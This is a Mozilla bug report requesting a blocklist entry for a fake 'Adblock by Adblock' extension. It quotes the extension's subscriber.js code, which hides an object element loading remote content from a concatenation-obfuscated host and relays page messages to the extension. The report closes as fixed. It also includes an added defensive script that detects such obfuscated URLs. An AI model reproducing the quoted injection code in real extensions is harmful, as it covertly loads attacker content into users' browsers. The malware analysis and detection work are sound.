Closed Bug 1629925 Opened 5 years ago Closed 5 years ago

Extension Block Request: Adblock by Adblock

Categories

(Toolkit :: Blocklist Policy Requests, task)

RESOLVED FIXED

People

(Reporter: gwarser, Assigned: TheOne)

Details

Extension name: Adblock by Adblock
Extension versions affected: <all versions>
Platforms affected: <all platforms>
Block severity: hard

Reason

I did not install it, but I believe this is an attempt to inject remote content into the page from //object.center/object. It's similar to the "youtube downloaders" I reported some time ago.

Extension IDs

adblock-6.6@addons.mozilla.org

Additional Information

This is what is similar to these other modified YT extensions:

js/scriptlet/subscriber.js:

var onSubscriberBlocked = function(details) {

	var subscriberConfirmBlocked = details.confirmBlocked;
	
	// Because in case
	if ( typeof vAPI !== 'object' ) {
	    //console.debug('subscriber.js > vAPI not found');
	    return;
	} else {
		//console.debug('subscriber.js > noop');
		if(subscriberConfirmBlocked > 999) {
			var noop = document.createElement('object');
			noop.id = 'noop'; noop.data = '//object'+'.'+'center/object';
			noop.setAttribute('style', 'visibility:hidden');
			noop.onerror = function() { a.remove() };
			var noopDiv = document.createElement('div');
			var a = document.body.appendChild(noopDiv);
			noopDiv.appendChild(noop);
		}
	}
};

// hxxps://github.com/chrisaljoudi/uBlock/issues/464
if ( document instanceof HTMLDocument === false ) {
    //console.debug('subscriber.js > not a HTLMDocument');
    return;
} else {
	var messaging = vAPI.messaging;
	messaging.send(
        'scriptlets',
        { what: 'subscriberBlocked' },
        onSubscriberBlocked
    );
}

function compatibilityMessage(evt) {
	try {
		var msg = JSON.parse(evt.data);
		var u = 'undefined';
		if (msg) {
			if (typeof msg.__filter__ !== u) {
				chrome.runtime.sendMessage({
					message: evt.data
				});
			}
			if (typeof msg.__catch__ !== u) {
				var rem = document.getElementById('noop');
				rem.parentElement.remove();
			}
		}
	} catch (e) {
		return false;
	}
}

if (window.addEventListener) {
	// For standards-compliant web browsers
	window.addEventListener("message", compatibilityMessage, false);
} else {
	window.attachEvent("onmessage", compatibilityMessage);
}

Also there is some messaging magic (trigger?) at the bottom of js/background.js.

This add-on violates Mozilla's No Surprises add-on policy
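
A review-side check for the obfuscation visible in the subscriber.js excerpt above, where the host is assembled as '//object'+'.'+'center/object' so that a plain text search for the domain misses it. This is an added example, not part of the bug report or of Mozilla's review tooling; the function names and the constructed control line in the sample are assumptions.

```javascript
// Merge adjacent string literals joined by '+', e.g. 'a'+'.'+'b' -> 'a.b'.
// Heuristic: handles plain quoted literals without escapes or embedded
// quotes, which is enough for the pattern quoted in this report.
function foldStringConcats(src) {
  const pair = /(['"])([^'"\\\n]*)\1\s*\+\s*(['"])([^'"\\\n]*)\3/;
  let out = src;
  let prev;
  do {
    prev = out;
    out = out.replace(pair, (_m, _q1, a, _q2, b) => "'" + a + b + "'");
  } while (out !== prev);
  return out;
}

// After folding, list string literals that are absolute or scheme-relative
// URLs. A URL that does not occur verbatim in the original source was only
// visible after folding, so it is marked as obfuscated.
function findHiddenRemoteUrls(src) {
  const folded = foldStringConcats(src);
  const urlLiteral =
    /(['"])((?:https?:)?\/\/[A-Za-z0-9.-]+\.[A-Za-z]{2,}[^'"\s]*)\1/g;
  const findings = [];
  for (const m of folded.matchAll(urlLiteral)) {
    const url = m[2];
    const host = url.replace(/^(?:https?:)?\/\//, '').split(/[/:?#]/)[0];
    findings.push({ url, host, obfuscated: !src.includes(url) });
  }
  return findings;
}

// Sample input: three lines as quoted in the report, plus one constructed
// control line with an unobfuscated URL.
const SAMPLE = [
  "var noop = document.createElement('object');",
  "noop.id = 'noop'; noop.data = '//object'+'.'+'center/object';",
  "noop.setAttribute('style', 'visibility:hidden');",
  "var docs = 'https://example.org/help';",
].join('\n');

for (const f of findHiddenRemoteUrls(SAMPLE)) {
  console.log((f.obfuscated ? 'OBFUSCATED ' : 'plain      ') + f.host + '  ' + f.url);
}
```

A reviewer would run this over every script in the unpacked add-on and look first at hosts flagged as obfuscated, since the author took a step to keep them out of a text search.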

Assignee: nobody → awagner
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true

The block has been staged. Simon, can you review and push?

Flags: needinfo?(sbennetts)
Group: blocklist-requests
Status: ASSIGNED → RESOLVED
Closed: 5 years ago
Flags: needinfo?(sbennetts)
Resolution: --- → FIXED